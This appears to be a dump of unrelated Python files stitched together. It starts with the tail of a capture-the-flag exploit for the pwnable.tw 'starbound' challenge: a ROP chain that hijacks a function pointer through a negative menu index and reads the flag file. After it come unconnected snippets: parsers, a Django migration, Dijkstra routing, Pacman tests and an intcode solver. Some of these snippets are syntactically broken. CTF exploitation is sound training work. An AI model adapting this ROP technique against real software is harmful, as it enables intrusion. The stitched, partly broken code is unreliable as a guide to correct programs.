pop2ret = 0x080498a9 # pop ebx ; pop edi ; ret
pop3ret = 0x080494da # pop ebx ; pop esi ; pop edi ; ret
# Byte sequence alias
A4 = 4 * b'A'
def call_func(func_addr: int, ret_addr: int, argv: list) -> bytes:
    """Build a 32-bit ROP call frame: [function][return address][arg0..argN]."""
    frame = [p32(func_addr), p32(ret_addr)]
    frame.extend(p32(arg) for arg in argv)
    return b''.join(frame)
def set_name(proc, name: bytes):
    """Drive the menu to store *name* as the username (options 6 -> 2 -> name -> 1)."""
    for choice in (b'6', b'2'):
        proc.recvuntil('> ')
        proc.send(choice)
    proc.recvuntil('Enter your name: ')
    proc.sendline(name)
    # Back out of the name submenu.
    proc.recvuntil('> ')
    proc.send(b'1')
def main():
    """
    How this program works
    ===
    1. In main(), the program reads 256 bytes from the user
       onto the stack, and then calls strtol() to parse
       the index string to an int.
    2. In .bss, there are an array of function pointers `fptrs`.
       When the user types `2`, then the function at `fptrs[2]`
       will be called.
    3. The username's buffer resides in .bss and it is
       *before* `fptrs`.
    Exploitation
    ===
    1. Since the username's buffer is *before* the array
       of menu function pointers, we can give the program some
       negative index to achieve arbitray execution.
    2. Instead of just typing the index, a malicious user can
       send additional bytes following the index. Even though
       they'll be ignored by strtol(), the data are still there
       on the stack. -> ROP
    3. ROP?
       a) open(), read(), write(), or
       b) return2dl_resolve and call system("/bin/sh")
    """
    proc = remote('chall.pwnable.tw', 10202)
    #proc = elf.process()
    log.debug('You may attatch this process to gdb now.')
    # Pause so a debugger can be attached.  BUG FIX: raw_input() is Python 2
    # only and raised NameError under this file's python3 shebang; input()
    # is the Python 3 equivalent.
    input()
    # Store a stack-lifting gadget as the "username" so the negative menu
    # index below makes the program call it.
    set_name(proc, p32(add_esp_0x28_pop_ebx_ret))
    payload = str((username - fp_array) // 4).encode().ljust(4, b'A')
    payload += A4 * 5
    # ROP chain: read "/bin/sh" + flag path into .bss, then open/read/write the flag.
    payload += call_func(elf.sym['read'], pop3ret, [0, bin_sh, 256])
    payload += call_func(elf.sym['open'], pop2ret, [flag_path, O_RDONLY])
    payload += call_func(elf.sym['read'], pop3ret, [3, buf, 64])
    payload += call_func(elf.sym['write'], pop3ret, [1, buf, 64])
    proc.recvuntil('> ')
    proc.send(payload)
    time.sleep(0.5)
    # Data consumed by the first read() in the chain: bin_sh then flag_path.
    proc.send(b'/bin/sh\x00/home/starbound/flag\x00')
    proc.interactive()

if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
"""Tests for Windows AMCache (AMCache.hve) files."""
import unittest
from dtformats import amcache
from tests import test_lib
class WindowsAMCacheFileTest(test_lib.BaseTestCase):
  """Windows AMCache (AMCache.hve) file tests."""

  # pylint: disable=protected-access

  # TODO: add test for _ReadFileKey
  # TODO: add test for _ReadFileReferenceKey

  def testReadFileObject(self):
    """Tests the ReadFileObject function."""
    test_file_path = self._GetTestFilePath(['Amcache.hve'])
    # Skip (not fail) when the test fixture file is absent.
    self._SkipIfPathNotExists(test_file_path)
    output_writer = test_lib.TestOutputWriter()
    test_file = amcache.WindowsAMCacheFile(
        debug=True, output_writer=output_writer)
    # NOTE(review): only checks that Open() does not raise; no assertions on
    # parsed content and no matching Close() call.
    test_file.Open(test_file_path)

if __name__ == '__main__':
  unittest.main()
|
def counting(a, b, X):
    """Count monotone lattice paths from cell (1, 1) to cell (a, b).

    A path may only step down (i+1) or right (j+1); cells listed in *X*
    (pairs [i, j]) are blocked.  Returns 0 when no path exists or when the
    target grid is empty (a < 1 or b < 1).
    """
    if a < 1 or b < 1:
        # No start cell (1, 1) exists; the original indexed A[1][1] and crashed.
        return 0
    # A[i][j] == -1 marks "not yet computed"; borders and blocked cells are 0.
    A = [[-1 for j in range(b + 1)] for i in range(a + 1)]
    for i in range(a + 1):
        A[i][0] = 0
    for j in range(b + 1):
        A[0][j] = 0
    for i, j in X:
        A[i][j] = 0
    # Seed the start cell -- unless it is itself blocked.  BUG FIX: the
    # original wrote 1 unconditionally, reporting paths through a blocked start.
    if A[1][1] == -1:
        A[1][1] = 1
    for i in range(1, a + 1):
        for j in range(1, b + 1):
            if A[i][j] == -1:
                A[i][j] = A[i-1][j] + A[i][j-1]
    return A[a][b]
# Demo: 5x6 grid with two blocked cells.
rows, cols = 5, 6
blocked_cells = [[2, 3], [4, 5]]
print(counting(rows, cols, blocked_cells))
# -*- coding: utf-8 -*-
"""Convert support.support="never" to "no".
"never" was used to signal that the browser maintainer had decided not to
support a feature, and was usually supported by a WON'T FIX ticket. This
changes the API strategy to support="no", and (optionally) linking to
supporting documentation in a note.
See https://bugzilla.mozilla.org/show_bug.cgi?id=1170209
"""
from __future__ import print_function, unicode_literals
from django.conf import settings
from django.db import migrations
from webplatformcompat.cache import Cache
def convert_support_never(apps, schema_editor):
    """Forward migration: rewrite every Support row with support='never' to
    support='no', recording each change in the history tables under one
    changeset attributed to the oldest superuser."""
    Support = apps.get_model('webplatformcompat', 'Support')
    has_never = Support.objects.filter(support='never')
    if has_never.exists():
        print('\nConverting support.support="never" to "no"...')
        Changeset = apps.get_model('webplatformcompat', 'Changeset')
        HistoricalSupport = apps.get_model(
            'webplatformcompat', 'HistoricalSupport')
        User = apps.get_model(settings.AUTH_USER_MODEL)
        superuser = User.objects.filter(
            is_superuser=True).order_by('id').first()
        assert superuser, 'Must be at least one superuser'
        cs = Changeset.objects.create(user=superuser)
        for support in has_never.iterator():
            print('Support %d: Converting support to no' % support.id)
            # Update the instance
            support.support = 'no'
            support._delay_cache = True  # defer cache refresh; versions purged below
            support.save()
            Cache().delete_all_versions('Support', support.id)
            # Create a historical support
            # ('~' = change record; copies every concrete field of the row)
            hs = HistoricalSupport(
                history_date=cs.created, history_changeset=cs,
                history_type='~',
                **dict((field.attname, getattr(support, field.attname))
                       for field in Support._meta.fields))
            hs.save()
        cs.close = True
        cs.save()
def warn_about_converted_never(apps, schema_editor):
    """Reverse migration: converted rows are not restored; just warn if any
    history records show support='never' was ever used."""
    HistoricalSupport = apps.get_model(
        'webplatformcompat', 'HistoricalSupport')
    if HistoricalSupport.objects.filter(support='never').exists():
        print('\nWARNING: support=never used in past, not restored')
class Migration(migrations.Migration):
    """Data migration: support='never' becomes support='no' (warn-only reverse)."""

    dependencies = [
        ('webplatformcompat', '0010_simple_history_updates'),
    ]
    operations = [
        migrations.RunPython(convert_support_never, warn_about_converted_never)
    ]
|
# Author:ambiguoustexture
# Date: 2020-03-08
import codecs
import snowballstemmer
from collections import Counter
from stop_words import isStopword
# Input corpus (one labelled sentence per line) and the output feature list.
file_sentiment = './sentiment.txt'
file_features = './features.txt'
file_encoding = 'cp1252'
stemmer = snowballstemmer.stemmer('english')
word_counter = Counter()
with codecs.open(file_sentiment, 'r', file_encoding) as sentiment:
    for sentence in sentiment:
        # sentence[3:] presumably skips a leading sentiment label such as
        # "+1 " -- confirm against the corpus format.
        for word in sentence[3:].split(' '):
            word = word.strip()
            word = stemmer.stemWord(word)
            if isStopword(word):
                continue
            # Drop 1-character tokens, except the sentiment-bearing '!' and '?'.
            if word != '!' and word != '?' and len(word) <= 1:
                continue
            word_counter.update([word])
# Use those with 6 or more appearances for features
features = [word for word, count in word_counter.items() if count >= 6]
with codecs.open(file_features, 'w', file_encoding) as content_features:
    print(*features, sep='\n', file=content_features)
|
import pandas as pd
import csv
import numpy as np
import matplotlib.pyplot as plt
import pickle
import pprint
from makeGraph import *
INF_val = 999999  # "infinity" placeholder for unreached Dijkstra costs
runOrderNumber = 100  # process at most this many orders
# read in graph from pkl file
pkl_file = open('graph.pkl', 'rb')
graph = pickle.load(pkl_file)
print('Read in graph Done!')
pkl_file.close()
# read in sheet for orders and commodities
pkl_orders = open('sheet_orders.pkl', 'rb')
pkl_commodities = open('sheet_commodities.pkl', 'rb')
sheet_orders = pickle.load(pkl_orders)
sheet_commodities = pickle.load(pkl_commodities)
print('Read in sheets for tables Done!')
pkl_orders.close()
pkl_commodities.close()
hubChoose = []  # NOTE(review): appears unused in this file
# construction of order
def getOrder(i):
    """Build an Order from row *i* of sheet_orders (rows are 1-based; row 1 is the header)."""
    def cell(col):
        return sheet_orders.cell(row=i, column=col).value

    order = Order()
    order.index = i - 1
    order.start = cell(1)
    order.end = cell(2)
    when = cell(3)
    # Store the order time as seconds since midnight so times compare numerically.
    order.orderTime = when.hour * 3600 + when.minute * 60 + when.second
    order.goods = cell(4)
    order.amount = cell(5)
    order.isEmergency = cell(6)
    # Total shipment weight = unit weight (commodity sheet, column 4) * amount.
    order.totalWeight = sheet_commodities.cell(row=order.goods + 1, column=4).value * order.amount
    return order
def seconds2time(seconds):
    """Format a second count as zero-padded HH:MM:SS (hours may exceed 23)."""
    hours, remainder = divmod(seconds, 3600)
    minutes, secs = divmod(remainder, 60)
    return "%02d:%02d:%02d" % (hours, minutes, secs)
if __name__ == '__main__':
    orderIndexNum = 2  # spreadsheet rows are 1-based; row 1 is the header
    # Process orders until an empty row (or runOrderNumber is exceeded).
    while (sheet_orders.cell(row=orderIndexNum, column=1).value):
        if orderIndexNum > runOrderNumber:
            break
        order = getOrder(orderIndexNum)
        # initial for dijkstra
        # node_dic maps city id -> [cost so far, preorder edge,
        # arrival time (seconds since midnight), elapsed wait+travel time]
        select_node_list = []
        node_dic = {}
        select_node_list.append(order.start)
        for index in range(len(graph)):
            node_dic[index+1] = [INF_val, -1, -1, 0]  # current cost, preorder edge, arrival time, passedTime
        node_dic[order.start] = [0, -1, order.orderTime, 0]  # set the start node
        # Relax the edges leaving the start city.
        for edge in graph[order.start-1].edges:
            weight = edge.weight(order, order.orderTime)
            transTime = edge.distance / edge.speed * 3600 + edge.delayTime * 60
            waitTime = (edge.departureTime - order.orderTime if (order.orderTime <= edge.departureTime) else DAY_SEC - order.orderTime + edge.departureTime)  # the time to wait for departure
            arrivalTime = (order.orderTime + waitTime + transTime) % DAY_SEC
            oldNode_dic = node_dic[edge.end]  # NOTE(review): unused in this first pass
            node_dic[edge.end][0] = weight
            node_dic[edge.end][1] = edge
            node_dic[edge.end][2] = arrivalTime
            node_dic[edge.end][3] = waitTime + transTime
        # execution of dijkstra
        while (len(select_node_list) < CITY_NUM):
            min_key = -1
            min_val = INF_val
            # find the current nearest node
            for key, val in node_dic.items():
                if key not in select_node_list and val[0] < min_val:
                    min_key = key
                    min_val = val[0]
            # insert into selected list
            if min_key != -1:
                select_node_list.append(min_key)
                min_dic = node_dic[min_key]
            else:
                break  # remaining cities are unreachable
            # update the dictionary (relax edges out of the settled city)
            for edge in graph[min_key-1].edges:
                oldNode_dic = node_dic[edge.end]
                weight = edge.weight(order, min_dic[2])
                if oldNode_dic[0] > weight + min_dic[0]:
                    transTime = edge.distance / edge.speed * 3600 + edge.delayTime * 60
                    waitTime = (edge.departureTime - min_dic[2] if (min_dic[2] <= edge.departureTime) else DAY_SEC - min_dic[2] + edge.departureTime)  # the time to wait for departure
                    arrivalTime = (min_dic[2] + waitTime + transTime) % DAY_SEC
                    node_dic[edge.end][0] = weight + min_dic[0]
                    node_dic[edge.end][1] = edge
                    node_dic[edge.end][2] = arrivalTime
                    node_dic[edge.end][3] = min_dic[3] + transTime + waitTime
        # format the path (not include the start node)
        # Walk preorder edges backwards from the destination, then reverse.
        path = []
        path.append(order.end)
        preorderNode = node_dic[order.end][1].start
        while preorderNode != order.start:
            path.append(preorderNode)
            preorderNode = node_dic[preorderNode][1].start
        path.reverse()
        # print the path and compute the total time and cost
        totalCost = 0
        print('The transport solution we choose for order (%d) is as follows: (totalWeight: %f)' % (order.index, order.totalWeight))
        for i in range(len(path)):
            edge = node_dic[path[i]][1]
            edgeCost = order.totalWeight * edge.unitCost * (edge.distance/50)
            totalCost += edgeCost
            start = edge.start
            end = edge.end
            way = edge.way
            departureTime = seconds2time(edge.departureTime)
            arrivalTime = seconds2time(node_dic[path[i]][2])
            print('Deliver from city %d to city %d, taking %s, departure at %s, arrive at %s, distance: %f, speed: %f, unitCost: %f, cost: %f' % (start, end, way, departureTime, arrivalTime, edge.distance, edge.speed, edge.unitCost, edgeCost))
        # After the loop, i / path[i] refer to the final leg (the destination).
        startTime = order.orderTime
        endTime = node_dic[path[i]][2]
        totalTime = node_dic[path[i]][3]
        m, s = divmod(totalTime, 60)
        h, m = divmod(m, 60)
        print('The total cost for delivery is', totalCost)
        print('orderTime:', seconds2time(startTime), 'endTime:', seconds2time(endTime), 'totalTime: %d hours, %d minutes, %d seconds' % (h, m, s), 'whick is %d seconds' % totalTime)
        print('')
        print('')
        orderIndexNum += 1
|
'''
In this script, we practice writing exceptions.
Exceptions or exception objects are what are raised when your program encounters an error.
Exceptions contain:
- a description of what went wrong
- and a traceback of where the error occurred in the script
Typically, writing exceptions come in the form of this:
try:
# Runs code in this block first
# If no problem occurs, after the try block, python will skip all the except blocks
# and RUN the code in the ELSE block and then RUN the FINALLY block
# <code>
pass
except:
# If an error occurs, jump to this except block
# <code>
pass
except:
# you can have more than one exception and different types of exceptions
# <code>
pass
else:
# The code in the ELSE block runs if the try block code runs successfully
# <code>
pass
finally:
# The code in the FINALLY block runs regardless of what happens above, or no error
# <code>
pass
You can use one of the exceptions from the built-in exceptions or
you can make your own by subclassing from the builtin exception class.
'''
'''
EXAMPLE
Objective:
- write a binary file and return the data
- measure the time required to do this
'''
import timeit
import logging # for logging the results of our run
import os
# First create a logger with basic debug level
# (problems.log is created in the current working directory)
logging.basicConfig(filename=os.path.join(os.getcwd(), "problems.log"),
                    level=logging.DEBUG)
logger = logging.getLogger()  # module-wide root logger used by read_file_timed
def read_file_timed(path):
    """Return the binary contents of the file at *path*, logging the elapsed time.

    Raises FileNotFoundError (after logging it) when the file is missing.
    """
    start_time = timeit.default_timer()
    try:
        with open(path, "rb") as read_file:
            data = read_file.read()
            return data
    # name the FileNotFoundError object err
    except FileNotFoundError as err:
        # we log the error
        logger.error(err)
        # re-raise so the caller still sees the FileNotFoundError
        raise
    else:
        # This code only executes if there are no exceptions from the try block
        pass
    finally:
        stop_time = timeit.default_timer()
        dt = stop_time - start_time
        # BUG FIX: os.path has no attribute 'filename', so the original raised
        # AttributeError from this finally block on *every* call (success or
        # failure); os.path.basename() is the intended function.
        logger.info("Time required for {} = {}".format(os.path.basename(path), dt))
# NOTE(review): hard-coded local path -- on any other machine
# read_file_timed() will log and re-raise FileNotFoundError here.
path = '/home/dennis/Desktop/Link to datascience_job_portfolio/notesfromcharliesession.md'
data = read_file_timed(path)
from .csp import SignupCSP
from .sma import SignupSMA
class Resolver(object):
    """Resolver object for processing waitlist or importing signups."""

    # Registry of short solver names to their implementing classes.
    __solvers = {'CSP': SignupCSP, 'SMA': SignupSMA}
    solver = None

    def __init__(self, solver):
        """Instantiate the solver class registered under *solver* ('CSP' or 'SMA')."""
        solver_cls = self.__solvers[solver]
        self.solver = solver_cls()
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
Exercise: compute 5! with a recursive function.
"""
# BUG FIX: the original used Python 2 print *statements*, which are syntax
# errors on Python 3; these print() calls behave the same there.
print()


def fib(n):
    """Return n! computed recursively.

    NOTE(review): despite the name this computes a factorial, not a Fibonacci
    number; the name is kept so existing callers keep working.
    """
    if n == 0 or n == 1:
        return 1
    return n * fib(n - 1)


print(fib(5))
|
# Stub signatures (bodies elided with "..."): presumably converters between a
# graph object and Cytoscape JSON data -- confirm against the real implementation.
def cytoscape_data(G, name: str = "name", ident: str = "id"): ...
def cytoscape_graph(data, name: str = "name", ident: str = "id"): ...
|
from django.urls import path
from . import views
urlpatterns = [
    path('', views.home, name='home'),  # site landing page
    path('gallery/', views.gallery, name='gallery'),  # gallery overview
    path('photo/<str:pk>/', views.viewImage, name='photo'),  # single photo by primary key
]
|
try:
from tkinter import *
except:
from Tkinter import *
import sys
sys.path.append('../src/org')
from gameplay import Pacman as pm
from gameplay import Wall as w
from maps import Map1
from display import DrawingGenerics
import unittest
class KeyPress(object):
    """Minimal stand-in for a Tk key event: carries just a mutable keysym string."""

    def __init__(self, keysym):
        # The symbolic key name, e.g. "Left" or "Down".
        self.keysym = keysym

    def getKeysym(self):
        """Return the current key symbol."""
        return self.keysym

    def setKeysym(self, newKey):
        """Replace the key symbol, letting one object simulate several key presses."""
        self.keysym = newKey
class test_Pacman(unittest.TestCase):
    """Unit tests for gameplay.Pacman, driven through a throwaway Tk canvas."""

    def setUp(self):
        # Fresh Tk root/canvas and a Pacman built from Map1 for every test.
        root = Tk()
        gameCanvas = Canvas(root, width = 200, height = 200)
        gameCanvas.grid(row = 0, column = 0)
        self.pacmanSpecs = Map1.getPacmanSpecifications()
        self.wallSpecs = Map1.getWallSpecifications()
        self.pacman = pm.Pacman(self, gameCanvas, self.pacmanSpecs)
        self.walls = []
        for i in self.wallSpecs:
            self.walls.append(w.Wall(gameCanvas,i))

    def getWalls(self):
        # Pacman asks its "game" (this test case) for the wall list.
        return self.walls

    def test_initGame(self):
        #Check that default values set by initGame have been set
        self.pacman.initGame()
        self.assertEqual(self.pacman.started_, False)
        self.assertEqual(self.pacman.left, True)
        self.assertEqual(self.pacman.right, False)
        self.assertEqual(self.pacman.up, False)
        self.assertEqual(self.pacman.down, False)
        self.assertEqual(self.pacman.currDir, 'left')
        self.assertEqual(self.pacman.inGame, True)

    def test_setHaltIterations(self):
        #Check that setHaltIterations has, in fact, set self.pacman.halt
        self.pacman.setHaltIterations(10)
        self.assertEqual(self.pacman.halt, 10)
        self.pacman.setHaltIterations(20)
        self.assertEqual(self.pacman.halt, 20)

    def test_movement(self):
        key = KeyPress("Left")
        self.pacman.movement(key)
        self.assertTrue(self.pacman.started_)
        self.assertEqual(self.pacman.desiredDir,"left")
        key.setKeysym("Right")
        self.pacman.movement(key)
        self.assertTrue(self.pacman.started_)
        self.assertEqual(self.pacman.desiredDir,"right")
        key.setKeysym("Up")
        self.pacman.movement(key)
        self.assertTrue(self.pacman.started_)
        self.assertEqual(self.pacman.desiredDir,"up")
        key.setKeysym("Down")
        self.pacman.movement(key)
        self.assertTrue(self.pacman.started_)
        self.assertEqual(self.pacman.desiredDir,"down")

    def test_energized(self):
        #Check that values that are supposed to change after calling energized() have changed
        self.pacman.energized(10)
        self.assertEqual(self.pacman.halt, 3)
        self.assertEqual(self.pacman.energizeCycles, 10)
        self.assertEqual(self.pacman.state, DrawingGenerics.PACMAN_STATE['Energized'])

    def test_checkReversalOfDirection(self):
        #Expected reversal of direction
        self.pacman.desiredDir = 'right'
        self.pacman.left = True
        self.pacman.right = False
        self.pacman.up = False
        self.pacman.down = False
        self.pacman.checkReversalOfDirection()
        self.assertTrue(self.pacman.right)
        self.assertFalse(self.pacman.left)
        self.assertFalse(self.pacman.up)
        self.assertFalse(self.pacman.down)
        #No expected change
        self.pacman.desiredDir = 'left'
        self.pacman.left = True
        self.pacman.right = False
        self.pacman.up = False
        self.pacman.down = False
        self.pacman.checkReversalOfDirection()
        self.assertTrue(self.pacman.left)
        self.assertFalse(self.pacman.right)
        self.assertFalse(self.pacman.up)
        self.assertFalse(self.pacman.down)
        #Expected reversal of directiono
        self.pacman.desiredDir = 'up'
        self.pacman.left = False
        self.pacman.right = False
        self.pacman.up = False
        self.pacman.down = True
        self.pacman.checkReversalOfDirection()
        self.assertTrue(self.pacman.up)
        self.assertFalse(self.pacman.right)
        self.assertFalse(self.pacman.left)
        self.assertFalse(self.pacman.down)
        #No expected change
        self.pacman.desiredDir = 'down'
        self.pacman.left = False
        self.pacman.right = True
        self.pacman.up = False
        self.pacman.down = False
        self.pacman.checkReversalOfDirection()
        self.assertTrue(self.pacman.right)
        self.assertFalse(self.pacman.left)
        self.assertFalse(self.pacman.up)
        self.assertFalse(self.pacman.down)

    def test_directionChanged(self):
        #Pacman is in starting position, expected to be able to turn left or right, but not up or down
        self.pacman.left = False
        self.pacman.right = False
        self.pacman.up = False
        self.pacman.down = False
        #No input/no desired direction
        self.pacman.desiredDir = ""
        self.assertFalse(self.pacman.directionChanged())
        self.assertFalse(self.pacman.left)
        self.assertFalse(self.pacman.right)
        self.assertFalse(self.pacman.up)
        self.assertFalse(self.pacman.down)
        #Try to move left
        self.pacman.desiredDir = "left"
        self.assertTrue(self.pacman.directionChanged())
        self.assertTrue(self.pacman.left)
        self.assertFalse(self.pacman.right)
        self.assertFalse(self.pacman.up)
        self.assertFalse(self.pacman.down)
        #Now moving left, so if we check directionChanged again, it should be false
        self.assertFalse(self.pacman.directionChanged())
        #Try to move up
        self.pacman.desiredDir = "up"
        self.assertFalse(self.pacman.directionChanged())
        #Direction cannot be changed, so remains left
        self.assertTrue(self.pacman.left)
        self.assertFalse(self.pacman.right)
        self.assertFalse(self.pacman.up)
        self.assertFalse(self.pacman.down)
        #Try to move right
        self.pacman.desiredDir = "right"
        self.assertTrue(self.pacman.directionChanged())
        #Direction can be changed, so becomes right
        self.assertFalse(self.pacman.left)
        self.assertTrue(self.pacman.right)
        self.assertFalse(self.pacman.up)
        self.assertFalse(self.pacman.down)
        #Now moving right, so if we check directionChanged again, it should be false
        self.assertFalse(self.pacman.directionChanged())
        #Try to move down
        self.pacman.desiredDir = "down"
        self.assertFalse(self.pacman.directionChanged())
        #Direction cannot be changed, so remains right
        self.assertFalse(self.pacman.left)
        self.assertTrue(self.pacman.right)
        self.assertFalse(self.pacman.up)
        self.assertFalse(self.pacman.down)

    def test_currCoordinates(self):
        #Check that real current coordinates are being returned
        xL = self.pacman.xLeft = 4
        xR = self.pacman.xRight = 20
        yT = self.pacman.yTop = 10
        yB = self.pacman.yBottom = 26
        xCenter = (xL + xR) / 2
        yCenter = (yT + yB) / 2
        # BUG FIX: this used assertTrue(value, tuple) -- the tuple was only a
        # failure *message*, so nothing was ever compared.  assertEqual makes
        # the intended comparison.
        self.assertEqual(self.pacman.currCoordinates(), (xCenter, yCenter))

    def test_currDirection(self):
        #Check that currDirection returns correct value
        direction = 'right'
        self.pacman.currDir = 'right'
        self.assertEqual(self.pacman.currDirection(), direction)
        direction = 'left'
        self.pacman.currDir = 'left'
        self.assertEqual(self.pacman.currDirection(), direction)
        direction = 'up'
        self.pacman.currDir = 'up'
        self.assertEqual(self.pacman.currDirection(), direction)
        direction = 'down'
        self.pacman.currDir = 'down'
        self.assertEqual(self.pacman.currDirection(), direction)

    def test_process(self):
        #Check for when Pacman is energized
        self.pacman.energizeCycles = 2
        self.pacman.halt = 0
        self.pacman.process()
        self.assertEqual(self.pacman.energizeCycles,1)
        self.assertEqual(self.pacman.state,DrawingGenerics.PACMAN_STATE['Energized'])
        self.assertEqual(self.pacman.speed,1.14 * DrawingGenerics.PIXEL)
        #Check for when Pacman is neither energized nor halted
        self.pacman.energizeCycles = 0
        self.pacman.halt = 0
        self.pacman.process()
        self.assertEqual(self.pacman.energizeCycles,0)
        self.assertEqual(self.pacman.state,DrawingGenerics.PACMAN_STATE['Normal'])
        self.assertEqual(self.pacman.speed,1.0 * DrawingGenerics.PIXEL)
        #Check for when Pacman is halted
        self.pacman.energizeCycles = 0
        self.pacman.halt = 4
        self.pacman.process()
        self.assertEqual(self.pacman.halt,3)
        self.assertEqual(self.pacman.state,DrawingGenerics.PACMAN_STATE['Normal'])
        #Halt doesn't change the speed, it just skips one iteration of process, stopping him temporarily
        self.assertEqual(self.pacman.speed,1.0 * DrawingGenerics.PIXEL)
        #Check for when Pacman is halted while energized
        self.pacman.energizeCycles = 4
        self.pacman.halt = 4
        self.pacman.process()
        self.assertEqual(self.pacman.energizeCycles,3)
        self.assertEqual(self.pacman.halt,3)
        self.assertEqual(self.pacman.state,DrawingGenerics.PACMAN_STATE['Energized'])
        #Halt doesn't change the speed, it just skips one iteration of process, stopping him temporarily
        self.assertEqual(self.pacman.speed,1.14 * DrawingGenerics.PIXEL)

    def test_restart(self):
        #This function relies on initGame, which has been tested already
        #Check that other values set have been set to what is expected
        self.pacman.restart()
        self.assertEqual(self.pacman.energizeCycles, 0)
        self.assertEqual(self.pacman.halt, 0)
        self.assertEqual(self.pacman.currCoordinates(), (self.pacman.specs['xCenter'], self.pacman.specs['yCenter']))
        self.assertEqual(self.pacman.desiredDir,"")
|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Qotto, 2019
""" Regular packages
Import BaseCommand
"""
from .command import BaseCommand
__all__ = [
'BaseCommand',
]
|
#!/usr/bin/env python3
import sys,math,numpy
from itertools import permutations
def testsquare(s, bestx, besty, wid, hei):
    """Probe the four corners of a wid x hei square whose NW corner is
    (bestx, besty); return [nw, ne, sw, se] booleans, True where the intcode
    machine reports beam coverage (output 1).

    The program is copied for every probe because doMachine mutates memory.
    """
    corners = [
        (bestx, besty),                       # NW
        (bestx + wid - 1, besty),             # NE
        (bestx, besty + hei - 1),             # SW
        (bestx + wid - 1, besty + hei - 1),   # SE
    ]
    angles = []
    for cx, cy in corners:
        out = doMachine(s.copy(), cx, cy)
        angles.append(out[0] == 1)
    return angles
def calcVal(s, pos, mode, rbase):
    """Read an intcode operand located at s[pos].

    mode 0 = position (s[s[pos]]), mode 1 = immediate (s[pos]),
    mode 2 = relative (s[rbase + s[pos]]); any other mode aborts the program.
    """
    if mode == 0:
        value = s[s[pos]]
    elif mode == 1:
        value = s[pos]
    elif mode == 2:
        value = s[rbase + s[pos]]
    else:
        print("Unknown mode", mode)
        sys.exit()
    return value
def putVal(s, pos, mode, rbase, val):
    """Write *val* through the operand at s[pos], mutating s in place.

    mode 0 = position (s[s[pos]]), mode 1 = immediate (writes s[pos] itself;
    flagged because intcode never writes in immediate mode), mode 2 = relative
    (s[rbase + s[pos]]).  Unknown modes abort the program.
    """
    if mode == 0:
        s[s[pos]] = val
        return
    if mode == 1:
        print("Mode 1 put should not happen")
        s[pos] = val
        # BUG FIX: without this return, control fell through to the
        # "Unknown mode" branch below and sys.exit() killed the program
        # after every mode-1 write.
        return
    if mode == 2:
        #print("Mode 2 put should not happen")
        s[rbase+s[pos]] = val
        return
    print("Unknown mode", mode)
    sys.exit()
def doMachine(s, inp1, inp2):
    """Run the intcode program in *s* and return the list of output values.

    The first input instruction consumes inp1, every later one consumes inp2.
    *s* is mutated in place, so callers pass a copy when the program must be
    reusable.  Halts (opcode 99) by returning the collected output; unknown
    opcodes abort the process.
    """
    output = []
    pos = 0     # instruction pointer
    rbase = 0   # relative base for mode-2 operands
    inp = inp1
    while (True):
        # Decode opcode (last two digits) and the three parameter modes.
        instr = s[pos] % 100
        mode1 = (int(s[pos]/100)) % 10
        mode2 = (int(s[pos]/1000)) % 10
        mode3 = (int(s[pos]/10000)) % 10
        #print(pos,s[pos],instr,mode1,mode2,mode3)
        if (instr == 99):  # halt
            return output
        elif (instr == 1):  # add
            x = calcVal(s, pos+1, mode1, rbase)
            y = calcVal(s, pos+2, mode2, rbase)
            putVal(s, pos+3, mode3, rbase, x+y)
            pos += 4
        elif (instr == 2):  # mult
            x = calcVal(s, pos+1, mode1, rbase)
            y = calcVal(s, pos+2, mode2, rbase)
            putVal(s, pos+3, mode3, rbase, x*y)
            pos += 4
            #print("Mult",res)
        elif (instr == 3):  # input
            #printScreen(output)
            #print("INPUT")
            putVal(s, pos+1, mode1, rbase, inp)
            inp = inp2  # every input after the first reads inp2
            pos += 2
        elif (instr == 4):  # output
            # (Legacy tile legend from an earlier puzzle day:
            #  0=unknown, 1=empty, 2=wall, 3=O2)
            out = calcVal(s, pos+1, mode1, rbase)
            output.append(out)
            pos += 2
        elif (instr == 5):  # jump-if-true
            x = calcVal(s, pos+1, mode1, rbase)
            y = calcVal(s, pos+2, mode2, rbase)
            if (x != 0):
                pos = y
            else:
                pos += 3
        elif (instr == 6):  # jump-if-false
            x = calcVal(s, pos+1, mode1, rbase)
            y = calcVal(s, pos+2, mode2, rbase)
            if (x == 0):
                pos = y
            else:
                pos += 3
        elif (instr == 7):  # less-than
            x = calcVal(s, pos+1, mode1, rbase)
            y = calcVal(s, pos+2, mode2, rbase)
            if (x < y):
                putVal(s, pos+3, mode3, rbase, 1)
            else:
                putVal(s, pos+3, mode3, rbase, 0)
            pos += 4
        elif (instr == 8):  # equals
            x = calcVal(s, pos+1, mode1, rbase)
            y = calcVal(s, pos+2, mode2, rbase)
            if (x == y):
                putVal(s, pos+3, mode3, rbase, 1)
            else:
                putVal(s, pos+3, mode3, rbase, 0)
            pos += 4
        elif (instr == 9):  # adjust relative base
            rbase += calcVal(s, pos+1, mode1, rbase)
            #print("rbase=",rbase)
            pos += 2
        else:
            print("Did not expect ", s[pos])
            sys.exit()
    # BUG FIX: a dead "return (output, xpos, ypos)" after this loop referenced
    # undefined names and was unreachable (the loop only exits via the returns
    # and sys.exit above); it has been removed.
#print(s)
#print("Part 1",s[0])
if len(sys.argv) != 2:
    print("Enter input file name as CLI")
    sys.exit()
# Read the comma-separated intcode program from the given file.
fp = open(sys.argv[1], "r")
l = fp.readline()
fp.close()
s = []
for string in l.split(","):
    s.append(int(string))
#print(s)
#OK, fix size assumptions not ideal but quick
# Pad memory so positional/relative writes past the program do not IndexError.
for i in range(10000):
    s.append(0)
# Part 1: count beam-covered points in the 50x50 grid.  Points on the far
# edges are kept as candidate rays to follow outward in part 2.
count = 0
valid_start = []
beam = numpy.zeros((50, 50))
for x in range(50):
    for y in range(50):
        sc = s.copy()
        out = doMachine(sc, x, y)
        #print(x,y,out)
        if out[0] == 1:
            beam[x][y] = 1
            count += 1
            if (x == 49 or y == 49):
                valid_start.append((x, y))
print("Part1 ", count)
# Part 2: start from a ray near the middle of the beam and step outward by
# `wiggle_dist`, shrinking the step until a wid x hei square fits entirely in
# the beam.  Only the NW/NE/SW corners are checked: if those three are
# covered, SE is inside the (convex) beam as well.
(validx, validy) = valid_start[int(len(valid_start)/2)]
wiggle_dist = 10
hei = 100
wid = 100
while True:
    # Candidate 1: jump diagonally.
    testx = validx+wiggle_dist
    testy = validy+wiggle_dist
